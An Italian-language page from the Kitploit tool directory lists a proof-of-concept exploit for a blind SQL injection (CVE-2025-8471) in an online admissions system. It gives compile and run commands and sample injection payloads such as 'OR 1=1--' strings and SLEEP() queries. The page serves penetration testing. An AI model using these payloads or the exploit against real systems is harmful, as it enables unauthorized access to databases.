Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8471 — Sfrutta SQL injection in projectworlds Online Admissions System v1.0 | Kitploit
Strumenti/GitHubGitHub/bytereaper77/cve-2025-8471
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingArchived
GitHubbytereaper77/cve-2025-8471

CVE-2025-8471

Sfrutta SQL injection in projectworlds Online Admissions System v1.0

Vedi Repository
211 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-8471 SQL Injection PoC

Autore: Byte Reaper
CVE: CVE-2025-8471
Vulnerabilità: SQL Injection in “projectworlds Online Admission System v1.0”
Descrizione:
Esiste una SQL injection cieca in adminlogin.php?a_id=. Questo PoC invia una serie di richieste GET con vari payload—sia a due fasi (INSERT … UNION SELECT …, SLEEP(), SELECT code …) che stringhe di “iniezione profonda”—per rilevare ed enumerare il problema tramite differenze nella lunghezza della risposta.


Requisiti

  • GCC (o qualsiasi compilatore C)
  • Header di sviluppo libcurl
  • argparse.h && argparse.c
  • Sistema compatibile POSIX (Linux, macOS)

Installazione

  1. Assicurati di avere libcurl e installati (es. su Debian/Ubuntu: ).

argparse
sudo apt-get install libcurl4-openssl-dev
  • Compila:

    root@kitploit:~
    gcc exploit.c argparse.c -o exploit -lcurl
    
    ./exploit -u <TARGET_BASE_URL> [-c cookies.txt] [-v]
    
    -u, --url — URL base del target, es. http://vulnsite.com
    
    -c, --cookies — (Opzionale) percorso del file dei cookie per mantenere la sessione
    
    -v, --verbose — Abilita output verbose di libcurl e dump completi delle risposte
    
  • Esempio:

    ./exploit -u http:// -v

    Questo farà:

    Inviare una richiesta normale a /adminlogin.php e registrare la sua lunghezza.

    Iterare sulle liste di payload a due fasi e profonde, iniettando ciascuna in ?a_id=….

    Confrontare la lunghezza della risposta di ogni iniezione con quella di base.

    Registrare ogni payload, codice di stato HTTP (se ≥2xx) e lunghezza osservata in result.log.

    Payload testati : Due fasi

    INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');

    SELECT SLEEP(2);

    SELECT code FROM stages WHERE id = 3;

    Iniezione profonda

    '//OR//1=1--, '//OR//'a'='a'--, …

    Include iniezioni booleane, basate sul tempo, union, substring, order-by, like, exists, comment-style.

    Tutti i payload sono codificati URL tramite curl_easy_escape prima della consegna.

    Riferimenti :

    • NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-8471
    • CVE : https://www.cve.org/CVERecord?id=CVE-2025-8471

    Licenza :

    Licenza MIT

    Scarica lo strumento